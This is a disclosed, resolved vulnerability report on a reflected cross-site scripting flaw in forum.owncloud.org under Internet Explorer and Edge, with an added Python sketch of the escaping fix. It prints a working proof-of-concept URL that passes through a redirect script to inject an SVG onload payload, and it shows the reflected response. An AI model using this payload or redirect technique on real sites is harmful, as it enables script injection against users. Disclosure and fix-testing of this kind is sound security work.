[forum.owncloud.org] IE, Edge XSS via Request-URI

Disclosed: 2016-08-30 16:26:03 By bobrov To owncloud
Vulnerability Details
**PoC** (Internet Explorer, Edge):

```
https://blackfan.ru/x?r=https://forum.owncloud.org/<svg/onload=alert(document.domain)>/%252e%252e
```

blackfan.ru/x?r is a simple redirection script that is necessary for exploitation.

**HTTP Response**:

```html
<div class="panel" id="message">
	<div class="inner">
		<h2 class="message-title">Information</h2>
		<p>No route found for "GET /<svg/onload=alert(document.domain)>/%2e%2e"</p>
	</div>
</div>
```
Report Stats
  • Report ID: 154319
  • State: Closed
  • Substate: resolved
  • Upvotes: 2
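
An added example, not part of the original report or of ownCloud's code: a sketch of the error page from the HTTP response above, rendered once with the request path copied in as-is and once with the message HTML-escaped, plus a regression check on the result. The function names and the template handling are hypothetical; the two paths are the ones quoted in the report.

```python
import html
from urllib.parse import unquote

# Values taken from the report above; everything else here is hypothetical.
POC_PATH = "/<svg/onload=alert(document.domain)>/%252e%252e"   # as in the PoC URL
REPORTED_PATH = "/<svg/onload=alert(document.domain)>/%2e%2e"  # as echoed in the response

TEMPLATE = (
    '<div class="panel" id="message"><div class="inner">'
    '<h2 class="message-title">Information</h2>'
    "<p>{message}</p></div></div>"
)


def path_after_redirect(poc_path):
    """The PoC carries %252e%252e and the response shows %2e%2e:
    one level of percent-decoding happens between the two."""
    return unquote(poc_path)


def render_unescaped(method, path):
    """'Before': the request path is copied into the markup unchanged."""
    return TEMPLATE.format(message=f'No route found for "{method} {path}"')


def render_escaped(method, path):
    """'After': the whole message is HTML-escaped before insertion."""
    message = f'No route found for "{method} {path}"'
    return TEMPLATE.format(message=html.escape(message, quote=True))


def message_contains_markup(body):
    """Regression check: True if a raw '<' or '>' survives inside <p>...</p>."""
    start = body.index("<p>") + len("<p>")
    end = body.rindex("</p>")
    inner = body[start:end]
    return "<" in inner or ">" in inner


if __name__ == "__main__":
    path = path_after_redirect(POC_PATH)
    for render in (render_unescaped, render_escaped):
        body = render("GET", path)
        print(render.__name__, "-> markup in message:", message_contains_markup(body))
```
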